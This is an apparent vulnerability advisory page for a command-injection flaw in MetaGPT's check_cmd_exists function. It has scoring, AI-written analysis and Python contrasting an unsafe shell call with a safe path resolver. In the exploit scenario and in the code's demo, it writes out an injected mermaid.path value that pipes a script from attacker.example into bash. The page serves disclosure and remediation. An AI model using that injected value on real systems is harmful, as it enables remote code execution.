Severity by source

CVSS vector (NVD, primary rating; the only source for this CVE):

CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description (CVE.org)
A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.2. Affected by this issue is the function check_cmd_exists of the file metagpt/utils/common.py. This manipulation of the argument mermaid.path causes command injection. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.
Analysis (AI)
Command injection in FoundationAgents MetaGPT through version 0.8.2 allows a remote, low-privileged attacker to execute arbitrary OS commands by manipulating the mermaid.path configuration argument passed to the check_cmd_exists function in metagpt/utils/common.py. A publicly available proof-of-concept (documented on Notion) demonstrates exploitation; however, this is not listed in CISA KEV and the CVSS vector assigns high attack complexity (AC:H), tempering real-world exploitability. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Exploitation requires an attacker to hold a low-privileged authenticated session with the MetaGPT application (PR:L per the CVSS vector; unauthenticated exploitation is not supported by the available data). … |
| Risk Assessment | The CVSS 3.1 base score of 5.0 (Medium) reflects a balanced set of signals: AV:N confirms the attack is initiated remotely over a network, but AC:H indicates high complexity, meaning the attacker must navigate specific conditions or race states not always under their direct control. … |
| Exploit Scenario | An attacker with low-privileged authenticated access to a MetaGPT instance (for example, a team member or API user) supplies a crafted mermaid.path value such as '/usr/bin/mmdc; curl http://attacker.example/shell.sh \| bash' through a configuration interface or API parameter. When MetaGPT internally calls check_cmd_exists with this unsanitized value, the shell interprets the injected commands, executing arbitrary code on the server under the MetaGPT process's OS identity. … |
| Remediation | No vendor-released patch has been identified at the time of analysis; the upstream project has not responded to GitHub issue #2037, and the remediation level is listed as unknown (RL:X) in the CVSS temporal vector. … |
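As an added illustration of the remediation point (example code written for this page, not MetaGPT's own `check_cmd_exists`), the following resolves a configurable tool path such as `mermaid.path` without ever handing the value to a shell, beside the string-concatenation pattern the description attributes to the vulnerable function. Function names and the `_SHELL_META` set are my own assumptions.

```python
"""Resolving a configured tool path as data rather than as shell syntax.

Illustrative code, not MetaGPT's own. The unsafe function only reproduces
the concatenate-into-a-shell-string pattern the advisory describes.
"""
import os
import shutil
import subprocess
from pathlib import Path
from typing import Optional

# Characters that have no place in a tool name or path and only matter to a shell.
_SHELL_META = frozenset(";|&$`<>()\\\"'\n\r")


def unsafe_check_cmd_exists(command: str) -> int:
    """Vulnerable pattern: the configured value becomes part of a shell string,
    so a value such as '/usr/bin/mmdc; ...' is executed rather than looked up.
    Kept for contrast only; never call it with untrusted input."""
    return os.system("command -v " + command + " >/dev/null 2>&1")


def safe_resolve_cmd(command: str) -> Optional[Path]:
    """Return the executable path for a tool name or explicit path, or None.

    Rejects values carrying shell metacharacters up front, then lets
    shutil.which() compare the value against the filesystem: an explicit path
    is checked directly, a bare name is searched on PATH, and in neither case
    does any shell parse the string, so an injected ';' cannot change what runs.
    """
    if not command or any(ch in _SHELL_META for ch in command):
        return None
    found = shutil.which(command)
    return Path(found) if found else None


def run_tool(command: str, *args: str) -> subprocess.CompletedProcess:
    """Invoke the resolved tool with an argv list (shell=False, the default)."""
    exe = safe_resolve_cmd(command)
    if exe is None:
        raise FileNotFoundError(f"tool not found or rejected: {command!r}")
    return subprocess.run([str(exe), *args], capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed inputs: the advisory's crafted value and a benign bare name.
    crafted = "/usr/bin/mmdc; curl http://attacker.example/shell.sh | bash"
    print(safe_resolve_cmd(crafted))    # None: rejected, nothing is executed
    print(run_tool("true").returncode)  # 0 on a POSIX host that has `true`
```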
Related identifiers: EUVD-2026-34985, GHSA-h4jg-8v58-57wj